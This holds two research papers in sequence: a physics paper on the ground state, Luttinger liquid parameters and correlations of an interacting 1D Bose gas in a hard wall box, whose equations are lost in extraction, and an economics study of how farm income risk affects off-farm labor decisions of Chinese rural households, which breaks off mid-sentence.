Applying the local density approximation to the 1D Bose gas with periodic boundary conditions at zero temperature, we have µ(n(z)) + V (z) = µ 0 (38) where µ(n(z)) is the local chemical potential of the uniform system and V (z) = 1 2 mω 2 z 2 is the local trapping potential. We make the Ansatz where R is the atomic cloud radius given by R = 2µ 0 mω 2 . The density profile of the system can be obtained by using the normalization condition With help of the analytical expressions for the ground state energy of the interacting Bose gas it is now straightforward to derive the density profiles in the Thomas-Fermi and Tonks-Girardeau regimes. (27) and (28) and the analytic expressions for weak coupling, (36) and (37). A slight discrepancy between the numerical and analytic results appears for weak coupling. This discrepancy becomes small if the particle number is very large. The analytic expressions are expected to hold in the region 1/N 2 ≪ γ ≪ 1.
For the Thomas-Fermi regime, the energy per particle is given by E 0 = 2 2m n(z)c and thus with central density and Thomas-Fermi radius Here c = 2/|a 1D |. The average energy per particle is given by In the Tonks-Girardeau limit, the local chemical potential is µ(n(z)) = 2 π 2 2m n 2 (z) and the density distribution is given by n(z) = n 0 The average energy per particle in the Tonks-Girardeau limit is E TG ≈ 1 4 Nω. The density profile has been studied in the whole regime [11]. The cloud size expands as the interaction strength inceases. In the Tonks-Girareau regime, the interaction-dependent radius is given approximately by Indeed this would slow down the increasing of the average energy with increasing interaction strength in the weak coupling regime if we consider the length of the hard wall box varying with γ via the relation L = 2R. However, further refinements are necessary for finite systems, i.e., for a finite number of confined bosons.
In the previous sections we have discussed in detail the derivation of the ground state energy of the 1D interacting Bose gas confined in a hard wall box. This integrable system is much easier to treat theoretically than the system with harmonic trapping. The experimentally measured 1D energy has been compared with theoretical curves obtained using the local density approximation [22]. However, the theoretical predictions are not convincing for a number of reasons. First it is not clear if the quantity γ avg presented in the Figures of Ref. [22] corresponds to the dimensionless interacting strength γ in the uniform Hamiltonian (1). Secondly, the interaction strength region measured, up to γ avg < 6, may be too small to be sure that the Tonks-Girardeau regime has been reached. Our theoretical results indicate that finite-size effects induced from the number of particles, the system size and the boundary conditions are not negligible in the weak coupling and Tonks-Girardeau regimes.
There is some similarity between harmonic trapping and hard wall box confinement. For γ = 0, the kinetic zero point oscillation energy is 1 4 ω for axial harmonic trapping. If we confine the 1D Bose gas in a hard wall box of length L = 2R 0 , where R 0 = 2 mω is the characteristic length of the harmonic oscillator, the kinetic energy per particle is π 2 16 ω for the hard wall boundary conditions, which is much larger than the kinetic zero point oscillation energy, for harmonic trapping. For the Tonks-Girardeau regime, if we confine the 1D Bose gas in a length L = 2R TG , the 1D energy per particle is which is almost the same as the average 1D energy E TG ≈ 1 4 Nω for harmonic trapping.
The boundary effects are more pronounced in the weak coupling limit. If one takes the same zero point kinetic energy and 1D ground state energy for the hard wall box as that for harmonic trapping, the size of the hard wall box for the γ = 0 and γ = ∞ limits should be L 0 = 2 π 2 mω and L TG = 2 N π 2 mω ( 1 3 + 1 2N ), respectively. Recall that we plotted the 1D temperature as a function of the interaction strength for the hard wall boundary conditions with L TG = 32.61µm and L = 2R TG = 35.25µm in figure 2. These numerical values follow on inserting the physical parameters for 87 Rb atoms into the above results, with N = 37, 87 m = 0.1454 × 10 −24 and ω = 2π × 27.5. In this way figure 2 can be compared with the experimental data in Figures 3A and 4 of Ref [22]. As observed in Ref. [22], the radius R of the atomic cloud for harmonic trapping increases rapidly with the interaction strength in the weak coupling regime, causing the average energy to increase rather slowly in comparison with the hard wall case.
Luttinger liquid behaviour
Many one-dimensional models behave like Tomonaga-Luttinger liquids due to the universality of the dispersion relation and correlation behaviour. The low energy properties are characterized by power-law decay in the correlation functions with gapless excitations. A universal description of the low-energy properties of one-dimensional interacting systems has been given in terms of harmonic liquid theory [25]. The 1D Bose and Fermi gases are included in this theory. The Luttinger liquid behaviour of the 1D Bose gas has recently been studied with hard wall boundary conditions [47]. It was found that the particle density exhibits Friedel oscillations with respect to the distance to the boundaries. The phase and density correlations are influenced by the hard wall boundary effects. Here we examine this behaviour in the context of the integable model.
The Luttinger parameters
The harmonic liquid approach to the low energy excitations of the 1D Bose gas is described by the effective Hamiltonian [25,40,47] Here v J is the phase stiffness, v N is the density stiffness and v s is the sound velocity. For the longwavelength density fluctuations the density ρ(x) = ρ 0 + Π(x) has small deviations from the ground state density ρ 0 . The boson field operator is defined as Ψ . The effective Hamiltonian (46) is reduced to the quantum hydrodynamic Hamiltonian [40,47] with regard to the particle-hole excitation modes. Here ω(q) = v s q for q ≪ ρ 0 and the wave number is restricted to q > 0. N is the total number of particles in the system and N 0 is the number in the ground state, with b † (q) the creation operator of elementary excitations. The low energy excitations are well described by the effective Hamiltonian (47) with Luttinger parameters v s and K. We now study the effect of the hard walls on the Luttinger liquid parameters. The density stiffness and sound velocity can be derived from the ground state energy via the relations [35,40] v N = L π Although the regime γ ≪ 1/N 2 is difficult to achieve in experiments, the boundaries nevertheless have a significant effect on the Luttinger behaviour in this regime. Using the ground state energy (14) Here the Fermi velocity v F = πn/m. We see that the Luttinger liquid parameter 1 N 2 + γ 2π 2 tends to infinity for γ → 0 at a faster rate than for periodic boundaries, for which K ≈ π/ √ γ [40] (see Figure 5). The enhancement of K for hard wall boundary conditions leads to a very slow decay of the phase correlation [40,47].
In the Thomas-Fermi regime 1/N 2 ≪ γ ≪ 1 we use the ground state energy in Section 5.2 to obtain the parameters In the strong coupling regime we use the result (9) to obtain We show a comparison of the Luttinger parameter K for the different boundary conditions in the Thomas-Fermi regime and the strong coupling regime in Figure 6. The parameter K varies from infinity to 1 + 1 4N . For weak coupling, K increases more quickly than in the periodic case. In the strong coupling limit, K tends to 1 for both cases.
The density fluctuations are suppressed in the weak coupling limit, while they are enhanced in the strong coupling limit. This can be seen directly from the leading term of the density expectation value [47] ρ(x) ≈ n 1 − 1 π π n2L| sin 2πx 2L | K sin(2πnx) (56) with a ≪ x ≪ L − a, where a is the cut-off length to the boundaries. For weak coupling we find a ≈ 1 n √ γ while in the strong coupling limit a ≈ 2 πn . In the weak coupling regime, the density fluctuations are suppressed due to the coherence of the wave functions. However, in the strong coupling limit, density fluctuations are evident due to the decoherence of the wave functions. These effects can be seen directly from equation (56).
Local correlation g 2
It is well known that the local correlations in the 1D Bose gas decay algebraically [38,41]. As for the periodic case, we can calculate the two-body correlation functions through the ground state energy for the hard wall boundary conditions. Using the Hellmann-Feynman theorem, the g 2 (γ) correlation function is given by [40,43] We thus obtain the correlation function g 2 in the various regions as These results are to be compared with the periodic case, for which The enhancement of the correlation function g 2 by the hard walls is largest for weak coupling, as can be seen in Figure 7. This is due to backward scattering increasing the probability of two particles scattering in comparson with only forward scattering for the periodic case.
Conclusion
We have considered the integrable interacting 1D Bose gas in a hard wall box. The exact Bethe Ansatz solution for the wavefunctions and eigenspectrum has been outlined in Appendix A. The ground state energy, including the bulk and surface energy have been derived from the Bethe equations (5) in different regimes. For N bosons, these are (i) the mean-field regime γ ≪ 1/N 2 , where the interaction energy is much smaller than the kinetic energy, (ii) the Thomas-Fermi regime 1/N 2 ≪ γ ≪ 1, and (iii) the strongly interacting Tonks-Girardeau regime γ ≫ 1. These results have been compared with the ground state energy obtained from the continuum Lieb-Liniger-type integral equations in the thermodynamic limit. The latter results, (26)- (28), are in agreement with those found by Gaudin [52]. The emphasis of our approach has been on finite systems and the effects of the hard wall boundary conditions. It is seen that the finite-size results compare well with those from the continuum integral equation, with the exception of the mean-field regime, where the integral equation is not expected to hold.
A connection to the 1D Bose gas trapped by a harmonic potential has also been made. The Luttinger liquid parameters, such as the density stiffness, sound velocity, and the local correlation function g 2 have been calculated from the ground state energy in the various regimes. It is clearly seen that the hard wall boundary conditions have a larger influence on the phase correlations in the weak coupling limit. The enhancement of the Luttinger liquid parameter K strongly suppresses the fluctuation in the ground state density expectation value. The local correlation g 2 is enhanced by the hard wall boundary conditions. A significant effect of the hard wall boundary conditions is that the wave-like properties of the bosons become more pronounced in the weak coupling regime. Significantly, the 1D interacting Bose gas confined in a hard wall box can be experimentally realized. Future experiments, highlighting the subtle interplay between system size and boundary effects in ultracold quantum gases, are eagerly awaited.
Observe that for c = 0, the wave function (A.5) reduces to the standing wave Ψ(x 1 , x 2 ) = sin k 1 x 1 sin k 2 x 2 + sin k 2 x 1 sin k 1 x 2 , with k 1 = n 1 π/L and k 2 = n 2 π/L for n 1 and n 2 non-zero integers. When c increases, k 1 and k 2 also increase as if the boson mass increases. The standing wave properties are gradually lost as the interaction becomes stronger.
In a similar way, we can derive the N-particle wave function given in (3). The coefficients are connected to each other via A(. . . , ǫ i k i , . . . , ǫ j k j , . . .) = ǫ i k i − ǫ j k j + ic ǫ i k i − ǫ j k j − ic A(. . . , ǫ j k j , . . . , ǫ i k i , . . .), (A.7) for i < j. Application of the boundary conditions leads to the explicit form of the coefficients given in (4), along with the Bethe equations (2). The wave function is unnormalized. | 2014-10-01T00:00:00.000Z | 2005-05-23T00:00:00.000 | {
"year": 2005,
"sha1": "58dfef1b373cf563b185faa6fc6f2783d5c88240",
"oa_license": null,
"oa_url": "http://arxiv.org/pdf/cond-mat/0505550",
"oa_status": "GREEN",
"pdf_src": "Arxiv",
"pdf_hash": "c5f260d3289d044871eb05fbf21022a87e284b42",
"s2fieldsofstudy": [
"Physics",
"Mathematics"
],
"extfieldsofstudy": [
"Mathematics",
"Physics"
]
} |
145024822 | pes2o/s2orc | v3-fos-license | Too Risky to Focus on Agriculture ? An Empirical Study of China ’ s Agricultural Households ’ Off-Farm Employment Decisions
This paper investigates China’s agricultural households and their individual members’ off-farm labor supply decision in response to farm production risks and a number of other factors (e.g., demographic characteristics, farm characteristics, and local market features). Whether and to what extent farming risks may affect farmers’ off-farm employment in China are rarely studied. Our paper provides an empirical study to demonstrate that agricultural production risks significantly impact off-farm labor supply in rural China. The impacts of associated variables on households off-farm labor supply decisions are quantified using a sample of large–scale nationwide household finance survey in 2010. The results suggest that off-farm employment serves as a risk adaption strategy for Chinese farmers. Policy suggestions on retaining farmers to focus on agricultural production are discussed.
Introduction
The economic reforms of China that started nearly four decades ago has led to dramatic changes in the economic landscape of the nation.The whole world has witnessed China's remarkable success in economic growth and poverty reduction.From 1981 to 2010, China's national GDP rose from 3.59 trillion Yuan to 50.21 trillion Yuan [1] and the poverty rate declined from 88.32% to 11.2% [2].Particularly, the expansion of rural economy has driven a large part of this success [3,4].Farmers' incomes have risen significantly and hundreds of millions of rural households have escaped poverty during this period [5][6][7].Specifically, CPI (Consumer Price Index) adjusted per capita rural income has increased more than fivefold, from 1786.33 Yuan in 1978 to 10,990.70Yuan in 2012 [8].During this period, many farmers and their family members began to engage in economic activities off their land, resulting in great prosperity of the non-farm economy.As a result, non-farm employment in rural communities rose from 108.7 million to 271.8 million and their respective ratio of the entire rural workforce increased from 22.8% to 52.6% from 1990 to 2010 [1].The booming non-farm economy in rural China has greatly improved farm household economic well-being, contributed by both employment expansion and rural income growth [9][10][11] Particularly, off-farm earnings rose to as much as 53% of rural household incomes in 2012 [8].
Off-farm employment in rural China has earned the focus of much research interest due to the huge size of rural labor force and the increased reliance on off-farm income by Chinese farm households.Previous literature showed that two groups of factors explain the observed labor supply: demographic characteristics and social networks.Using the Probit model, De Janvry et al. [7] found that higher educations and more social network connections increase the likelihood of a rural Chinese household to allocate their labor towards the off-farm activities.Similar results are presented in Chen et al. [12] where education, household size and social networks were found to be crucial in deciding the locations of employments by rural households.Zhang et al. [13] concluded that rural workers have been increasingly rewarded for their education through both better off-farm job access and higher wages.Their results suggest that investments in rural education are desperately needed to improve agricultural productivity and facilitate the demographic and economic transition of the rural areas.Restructuring the rural education system might enhance the rural human capital accumulation and economic development.Zhang et al. [14] concluded that there has been an overall increase in off-farm participation.Young urban migrants from rural regions have driven a large part of this increase.Gender difference has also been emphasized.A number of studies demonstrated that the determinants of off-farm labor supply participation vary significantly by gender [14][15][16].
The existing literature on off-farm labor supply in China centers on applying appropriate econometric methodologies to identify the impacts of various factors.However, we found a significant gap in the literature that agricultural production risks are rarely considered as a driving factor of farmers' labor allocation in China.Even in a global context, the only relevant studies we found are Mishra and Goodwin [17] and Mishra and Holthausen [18] that analyzed the impacts of risks of farming and off-farm incomes on the US farmers.Given the increasing importance of risk management in China's agricultural industries, such an overlook of production risks in the study of off-farm labor supply suggests a further investigation.In addition, we found a paucity of literature considering the regional heterogeneity when studying the off-farm employment decision in rural China.Our study strives to fill these information gaps.Thus, we focus on the following research questions: (1) How shall a China's farm household decide whether they would like to take off-farm jobs?(2) What are the driving forces of such a decision?(3) For a Chinese rural household, does such a labor supply decision respond to agricultural production risks?(4) Does this labor allocation decision differ across the regions?The overall goal of this paper is to contribute to the assessment of agricultural households decision-making on labor allocation in China.
Although production risks present an increasingly crucial challenge to agriculture, whether and to what extent such risks impact Chinas farmers engagement in off-farm employment has yet to be studied.Movitated by previous studies on the U.S. farmers [17,18], our study attempts to address agricultural production risks and evaluating their impacts in China.We empirically analyze a sample of Chinas rural households labor supply decisions.This paper will provide important economic insights and policy implications for both academic and public audiences.
Our empirical analysis uses a survey of Chinese households (China Household Finance Survey) in summer 2011.We focus on the households in which at least one member participated in farming activities in 2010.Our data include 2352 rural households from 21 provinces.A binary Logit model is adopted.The dependent variable is defined as whether a household participated in any form of off-farm income generating activity that requires their own labor input.The set of explanatory variables include the variations of farm incomes, the expectations of farming and off-farm incomes, household demographics (i.e., age and household size) and other relevant regressors.Furthermore, for the purpose of comparison, we also evaluate labor supply decisions at the individual level.In general, the results are consistent with our expectations.In particular, the risks of agricultural production are found to be a significant factor for Chinese farmers in their labor allocation decisions.
This paper fills the gap in the existing literature that, when evaluating rural households off-farm labor supply in China, agricultural production risks have never been considered.Our empirical analysis verifies our hypothesis that agricultural risks are a significant determinant in off-farm employment in China.Using our samples, we also identify and evaluate a number of important factors.In addition, we recognize and quantify regional heterogeneity among rural households off-farm labor supply decisions.
The rest of the paper is organized as follows.In Section 2, we introduce the data sets that are used for the analysis.Section 3 describes the empirical analysis and results to explain the determinants of employment decisions at both household and individual levels.Conclusions and policy implications are discussed in the final section.
Data
This study focuses on the rural households which were involved in agricultural activities in the sample year 2010.The China Household Finance Survey (CHFS) data is provided by the Survey and Research Center of China Household Finance, Southwestern University of Finance and Economics, Chengdu, China [19].The CHFS survey contained 3244 rural households from different provinces of China.Among the 3244 rural households, 1526 had both on-farm and off-farm sources of income while 829 had income exclusively derived from farm activities.The remaining 889 households took non-farm jobs as their exclusive means of income.Since this study only concerns farmers' labor supply decisions, these 889 rural non-farming households are excluded from our sample.Therefore, this study is concentrated on the households that either generate income exclusively from farming or have mixed income sources from both on-and off-farm activities.They received several categories of off-farm income: (1) income earned by self-employment in non-farm activities such as industrial and/or commercial activities; (2) income earned from formal or informal wage, including salary, allowance, bonus, dividend, and other sorts of remuneration; and (3) other income not related to farming.Since there are only three rural households in Shanghai, in order to avoid a biased representation of farm households for the region, we rule out Shanghai from our study area.As a result, our sample is consisted of 2352 farm households from 21 provinces.
Because agronomic and socioeconomic conditions differ significantly across the nation, we speculate such a difference in both returns of farming and off-farm jobs may result in heterogeneous patterns of farmers' off-farm labor supply.We consider including a set of variables to present different regions while not losing too many degrees of freedom in the regression.Therefore, we group the locations of our sampled farm households into four regions: (1) Western region; (2) Northeastern region; (3) Central region; and (4) Eastern region.The geographic boundaries of these four economic regions were defined by the central government during the Eleventh Five-Year Plan of China and have been widely used since then.Our study area with regional divisions is presented in Figure 1.
Furthermore, we examined the distribution of farm income using multiple data sources.We found that per acre farm incomes of the CHFS data set in 2010 and of the National Bureau of Statistics of China (NBSC) data set from 2005 to 2009 are indeed log-normally distributed as illustrated in Figures 2 and 3.
Table 1 summarizes farm household statistics of two household categories.Category one are households that participated in both farming and off-farm activities, and category two are households that exclusively participated in farming activities.As described from these data, on average, households that had both on-and off-farm sources of income have a lager household size, younger family members, higher education level, less farming experience, smaller farmland size and slightly closer distance to the county center as compared to those that solely engaged in agricultural production.
In addition to the household level analysis, we are also going to investigate each individual farmer's off-farm labor supply decisions.Therefore, we need to use individual level data in our sample.Among these 2352 farm households, the individual household members are classified into five categories: (1) pure farmers (a.k.a.full-time farmers) who only engaged in farming activities; (2) farmers who primarily engaged in the farming work but also had some off-farm income source (a.k.a.part-time farmers); (3) non-farmers who exclusively worked outside the farm; (4) dependents who were under 16 years old (Given China's compulsory education law, the 9-year compulsory education system requires all the children remain full time students until graduating from the junior secondary schools, when they would be at least 16 years old.However, there might be some children who started to participate in farming activities before that age, as pointed out by one anonymous referee.Since that proportion is small and the relevant information is not available in our sample, we assume that all children remain on a dependent status until 16 years old.); and (5) other unemployed adult individuals who did not have any job related information.This study focuses on the first three categories who qualify as the labor suppliers in the rural sector.Table 2 presents individual statistics of each category.Among working age individuals, off-farm workers (type two and three) are more likely to be single young males with higher education levels and smaller farmland holdings.
Econometric Models
To assess farmers' decisions of whether to take an off-farm job, a binary Logit model is applied to identify the determinants of household-level participation in off-farm activities.The binary respondent variable is defined as whether a farm household had any type of off-farm income sources.We consider that employment decisions are made upon available information at the beginning of a production cycle, such as own characteristics and prior information.The model specification can be expressed as follows: where Y * i is a non-observed continuous latent variable and Y i is an observed binary variable.Y i = 1 if the farm household participate in any off-farm activity, and Y i = 0 otherwise.R i is a vector of historical income information.X i is a vector of own characteristics.γ and β are parameters associated with R i and X i , respectively.i is a random disturbance term following a standard logistic distribution.
The explanatory variables of key interest in this paper are (1) the variation of farm income measured as the risks of agricultural production; (2) the expected farm income which reflects the relative return of agricultural production; and (3) the expected off-farm income which predicts the return of off-farm activities.Therefore, we adopted three historical income variables which are calculated using income information of the preceding several years: (1) standard error of per household farm income; (2) average per household farm income; and (3) average per household wage income.In order to better investigate the role of perceived agricultural production risks (i.e., how previous years' observed income variability affects farmers' off-farm labor supply), three time periods-three years, five years, and ten years-which represent short-term, medium-term and long-term, respectively, are included in the three alternative specifications.All income variables are at the province level (Household/individual level income information of preceding years is not available in our sample.However, province level data should be able to provide a more general historic outlook of local labor market conditions in each province, which farmers, as (potential) labor suppliers, need to face.As one anonymous referee pointed out, however, such provincial level variables may not fully capture the risks of farming and off-farming income.Instead, they may be indicators of geographic effects.)and adjusted by provincial CPI in 2010 Yuan.Data source of historical income is the National Bureau of Statistics of China.
Other explanatory variables represent own characteristics.Household size is the number of family members which determines the labor supply.The variable 'Male' represents the number of male members in the household.This variable controls for possible differences for the productivity between male and female.Proximity to the nearest downtown is included to capture the convenience of the farmers to the local markets.Farmland size is assumed to positively affect the relative return of agricultural production.Dependents are defined as individuals under 16 years old.Households with dependents need spend extra time on child care, leading to a decline in total available time (i.e., work and leisure time).Average age of a household controls for the possible differences in work time allocation.Younger households are often more mobile to search for an off-farm job.Therefore, they are more likely to work off the farm.Age squared is included to capture the possibility that the depreciation of human capital after a certain age offsets the accumulated experience.Average education per household is the factor which determines the quality of labor supply; in other words, the capacity to participate in the off-farm activities.Similarly, education squared is to capture the marginal return of formal education on the likelihood of gaining off-farm employment access.Average farm experience is hypothesized to positively affect the relative return of agricultural production.Households with more experience tend to be more productive.A number of dummy variables are assigned to four regions: Western region, Northeastern region, Central region, and Eastern region, respectively.To avoid the dummy variable trap, the Northeastern region was dropped from the estimation procedure and chosen as the reference category.Table 3 provides summary statistics for all the variables used in the household level participation equation.
For the purpose of comparing individual-level and household-level labor supply mechanisms and verifying the robustness of our model, we also assess the off-farm employment decision of an individual farm household member.We apply the same econometric model (Equation ( 25)) with similar alternative specifications to full-time farmers and non full-time farmers.The dependent variable is defined as whether the individual worker took any off-farm job or stayed as a pure farmer.(In this study, we focus onwhether and why farmers engage in off-farm income-generating activities.However, as one referee pointed out, there are many categories of off-farm activities, which should have varied impacts on farmers.Such a topic is of great importance and will be left for future studies.)The structure of this analysis is similar to that of the household-level analysis.Income variables are all in real per capita term.The Western region was dropped from the estimation procedure and chosen as the reference category.Table 4 provides summary statistics for all the variables used in the individual-level analysis.Average annual farm income per capita in each province 0.28 0.07 Average prior wage income (10,000 Yuan) Average annual wage income per capita in each province 0.13 0.07
Household-Level Results
We run the participation regression using four alternative specifications: (1) without income risk factors; (2) with short-term income risk (three-year); (3) with medium-term income risk (five-year); and (4) with long-term income risk (ten-year).Table 5 provides the Logistic regression results at the household level.In almost all aspects, the regression models perform well.The estimation of the model as a whole in each specification is highly significant and the coefficients of all explanatory variables in the models have the expected signs.
For those three scenarios in which previous years' income information, including farming income, off-farm income and farming risks (We also considered off-farm income risk (variation of off-farm wages) in our analysis but found its impact is insignificant and whether to include it does not change the results.In addition, industrial jobs are more stable and their pay rates are relatively less volatile, especially given the strengthened enforcement of minimum wage rates at which most rural labor suppliers receive.Then, we decided to drop that variable from our regression model.),are taken into account, and the results exhibit similar patterns with expected signs.In general, there is a significant overall impact of the income factors on the off-farm employment decision and this is confirmed by the F tests.In other words, all income variables are relevant and necessarily retained in the model.In particular, farming risk, as represented by the standard error of historical agricultural income, has a positive and significant effect on the off-farm employment choice.Depending upon the specification, my results reveal that, on average, for an increase of 10,000 Yuan in the standard error of agricultural income, the probability of the household taking off-farm jobs would increase by between 66.6% and 114.1% (Table 6).Likewise, this trend is due to the fact that farmers prefer consistent and predictable earnings.Rural households are more likely to take off-farm jobs when high risk of farm earnings is present.Taking off-farm jobs is an often chosen strategy by farmers to bear fluctuations in the agriculture sector.Expected incomes based on prior years earnings present significant impact, indicating rural households take their past income into account when they make employment decisions.Specifically, households with higher average farm income are more likely to stay constantly on the farm rather than to find an off-farm job.In contract, those farmers who previously earned higher off-farm wage income are more likely to find an off-farm job.
It is also found that farmers make off-farm labor supply choices responding to previous information of income variables in fairly different magnitudes across time.First of all, the impact of farm income variability is getting larger as the time period gets shorter.It indicates that people are more sensitive to short-term income oscillation and respond spontaneously.Second, farmers are more concerned with long-term change rather than short-term change of the income level.For example, the marginal effects of average preceding years' off-farm wage income are 0.13, 0.149 and 0.262 for three years, five years and ten years, respectively.The long-term effect is almost twice as much as the short-term and medium-term ones.Third, reducing farming risk is a lot more effective than enhancing farming income in retaining farmers focusing on their farm land, especially in the short term.When comparing reducing the standard error of farm income and increasing the farm income by the same amount, we find that reducing farming risks is almost 14 times more effective than improving farming income in the short term, six times more in the medium term and three times more in the long term (Table 5).In particular, reducing the farming risk (standard error of prior farm income) by only 100 yuan has the same impact as increasing average agricultural income by 1501 yuan in three years, by 725 yuan in five years and by 427 yuan in ten years.Furthermore, confirming our predictions, the general findings on the non-income variables all have expected impacts across different specifications.The coefficient of household size is positive and statistically significant at the 1% level.Households with larger size have more total time to spend and thus are more likely to send members off the land.The presence of young dependents makes the adults more prone to stay on their farm so that they can spend more time on dependents and less time on commuting.The relationship between age and the decision to work off-farm is quadratic-there is a threshold age (for example, 61 years old in model 2) under which a farm household has a positive marginal return to seek an off-farm income source.This is because the present value of future off-farm job wages will be much smaller for the old families, as they have less capable years to keep their jobs and recoup earnings.The phenomenon is evident from the coefficient of age squared, which is negative and statistically significant at the 5% level.This result also supports most people's impressions that the elderly are being left behind in the Chinese countryside.Years of schooling is positively associated with the off-farm employment.Schooling is generally expected to promote job mobility and migration.Formal education has strong effects for shifting farmers to off-farm work.Average years of farming experience among the labor force is a significant determinant of the off-farm employment decision for rural households.More farming experience corresponds to less likelihood of working off the farm.Such experience builds farming-specific human capital and thus increases the return of farming due to the higher quality of labor input and better control of production risk.
Finally, our results reveal that farm households behave significantly different from one region to the other.The results for testing the joint significance of the regional dummies (associated p-values are 0.044, 0.073, and 0.023 in model 2, 3 and 4, respectively) allow us to reject the null hypothesis of no regional effect at the 10% significance level.Therefore, we can conclude that there exists heterogeneity across regions.Specifically, compared to Northeastern China, off-farm employment is more attractive to farm households in the other three regions.Northeastern China is situated on one of the world's most fertile black soil belts and has the highest endowment of farmland per capita in China.Diversified cultivation as well as vigorous development of agriculture in recent years make the northeastern region an attractive and competitive market.Therefore, farm households are more likely to focus on their farm land.It is worth noting that the magnitudes of coefficients associated with regional dummies are larger in the short-term specification when compared to those in the mid-and long-term specifications.This may indicate that there is an increasing employment access gap between regions over time.That is, the regional disparities of resource allocation might be expanding.
For the purpose of model evaluation, we compared and mapped the actual and estimated off-farm job labor decisions.Figure 4a presents the real percentage of mixed income households (defined as those farm households that had both on-and off-farm income sources) among farm households based on the CHFS survey.Figure 4b shows the expected value of estimated probability of households working outside their lands based on our estimation.Since we only present the provincial average of our estimation, Figure 4 might lose some idiosyncratic information of each household.However, the overall distributions are similar, which suggests a good fit of our model.
Individual-Level Results
Table 7 provides the logistic regression results at the individual level.The results are generally consistent with household-level analysis.There is a significant overall impact of the income information on the off-farm employment decision among individuals and this is confirmed by the F tests.In particular, individual workers who experienced greater farm income variability were significantly more likely to work off-farm in the short term as well as in the mid term.This finding confirms our hypothesis that farm income variation significantly affects the individual employment choice.Expected wage income is found to be a significant determinant on the employment decision among the labor force.Higher average wage income in the past results in higher probability of a family worker seeking an off-farm job in the current year.Similar to what we found in the household-level analysis, individual farmers are also more concerned with short-term agricultural risks and long-term income level, while the former has a much larger impact on off-farm labor supply decisions.Individual characteristics are found to be statistically significant in this study.The general findings are as follows: (1) Males tend to have better access to the off-farm labor market; (2) Single workers have more freedom to allocate their labor; (3) Young people have a higher participation in off-farm labor market.On the opposite, older farm operators tend to more likely dedicate their time to own farming activities and less likely to off-farm work due to the higher opportunity costs associated with job searching; (4) Rural workers have been increasingly rewarded for their education through better off-farm job access since farmers with higher education acquired the skills needed for non-agricultural activities; (5) Due to labor constraints faced by the farm households, large households are more likely to have one or more members working as off-farmers or non-farmers; (6) Less land holding per capita is negatively associated with the off-farm employment choice because cultivated land is the major source of agricultural income.This finding implies that, for those farmers with a preference and expertise in farming, having more arable land can be a more favorable option than seeking off-farm employment; (7) In rural China, the closest county center is the place where non-farm industries and markets are usually located.Thus, the proximity to the town centers is a crucial determinant for rural household members to find local off-farm jobs; (8) Having more children in a household suggests less opportunities for the adult labor force to work outside the family farm.
In addition, our results confirm the heterogeneity across regions at the individual-level too.Choosing the Western region as the base category, we found that individual workers in this region are more likely to leave the farm for an off-farm job.The Western region is the less developed and the poorest region.This founding is in line with the results found in Du et al. [20] that the poor are more likely to migrate.Farming efficiency in this region is quite low due to limited access to inputs, financial services and markets and heavy reliance on traditional farming techniques.Therefore, working individuals of the rural sector in this region heavily depend on off-farm earnings to improve their living standards.
Comparing household-level and individual-level results, we observed the following differences: (1) the expected farm income only affects the household-level employment decision; (2) gender differences are only found at the individual level; (3) farm land size and proximity are found to be negatively associated with the labor supply in the off-farm market at the individual level; and (4) age exhibits a quadratic relationship with off-farm employment choice at the household level while it shows a negative relationship with individual-level off-farm employment status.
Conclusions
Agriculture is always one of the most important sectors for a nation.It does not only provide food and fibers for citizens' necessities, but also supports many households and communities in the rural areas, especially in a country like China with a dominant share of farm population.It is never too much to emphasize how important it is to keep the farming communities thriving and sustaining themselves in the new era.However, China's agricultural sector faces some critical challenges.We are concerned with one particular issue that the overall population of professional (pure) farmers are shrinking over the years.It is well recognized that farmers are moving from the countryside to cities (or towns) for either seasonal or permeant job opportunities due to the growing disparities in the wealth and development of rural and urban areas [16,21].However, the likelihood that agricultural production risks may also contribute to China's diminishing population of pure farmers is unintentionally overlooked.Particularly, whether and to what extent such risks affect farm households' off-farm employment in China was never studied.Given the importance of the agricultural sector and the urgency of maintaining stable and sustainable rural communities in China, it is essential to investigate farmers' on-and off-farm labor allocations.Therefore, in this study, we performed an empirical analysis to assess this topic.
This study contributes to the current literature in the empirical contexts.First of all, to our knowledge, this study is the first attempt to explore the role of agricultural risks on farmers' employment decisions in rural China.By bridging such a gap in the literature, our study suggests a more comprehensive investigation of this topic and evaluation of policy instruments.Second, we have empirically verified and quantified the effects of the associated explanatory variables.Such empirical evidence will provide useful insights for scholars and policy makers.
One major finding is that there is a positive and significant impact of farm income variability on off-farm work participation at both household and individual levels.This finding implies that off-farm employment is a risk adaption behavior among Chinese farmers.If the policy makers want to encourage farmers to focus on their land, they should consider policy instruments that could reduce the risks of farm income.(We are not tryingto advocate certain policies that restrain labor on the farm land.In fact, the government may also want to encourage farmers to seek off-farm income due to various other reasons.Here, we only attempt to discuss how to make farmers focus on their farms if that is the objective of policy makers.)Optional candidates should include, but are not limited to, price support, transfer payment and crop (livestock) insurance programs.All these policies should be able to encourage pure farming and stabilize the structure of society.For instance, to control agricultural production risks, the governments could apply subsidized risk management tool against risks of farm output.In addition, they could provide price support, which generally reduce the variability of price.These two strategies can be used to avoid income oscillations for farm households.Meanwhile, transfer payment can help the low-income families to enhance their nutrition and living conditions.While all these strategies can achieve both objectives of income enhancement and risk reduction, policy makers need to balance which objective to focus on, especially if resources is limited.Our results suggests that to alleviate the farm income risks would be generally much more effective in retaining farmers on their land, especially in the short run.Thus, the government should consider investing more resources towards the risk mitigation programs (i.e., insurance programs) than income enhancement programs if an immediate impact is expected.
In addition, our results suggest that if the policy makers aim to keep farmers focusing on farming, they should consider a combination of various policy instruments.First, the level of income is a crucial germinant for off-farm labor decisions, especially in the long run.On one hand, the government should always exert efforts to help with steady growth of farm income.On the other hand, the government may need to reconsider the regulations on the minimum wages that most migrant workers receive in the non-agricultural sectors.The fast growing minimum wages in the industrial and service sectors does not only impose additional costs for producers and consumers in those sectors, it may also drain the labor supply from agriculture sector.Second, policy makers should adopt strategies to encourage the farmers to expand their operation scale.The negative effect of farmland holdings on farm workers with respect to seeking off-farm employment may imply that, as long as a farmer is able to acquire more land, there is no reason why he must seek an off-farm job or abandon farming entirely.If this reasoning is correct, there are important policy implications regarding the development of the land market, such as the rental market, which is still in a nascent stage in rural China.In addition, the government may also consider offering monetary incentives for farmers to expand their farms, i.e., explore uncultivated land.Third, the government should employ better strategies to elevate farming related human capital.As is evident in our results, although farmers with higher education are more likely to seek off-farm jobs, more farming experience would help with retaining farmers.For example, technical and extension education for farmers is expected to enhance their farming knowledge and mitigate the production risks.Fourth, it is always important to recognize the regional differences when formulating agricultural policies.The government should prioritize the regions that are losing the farmers quickly and 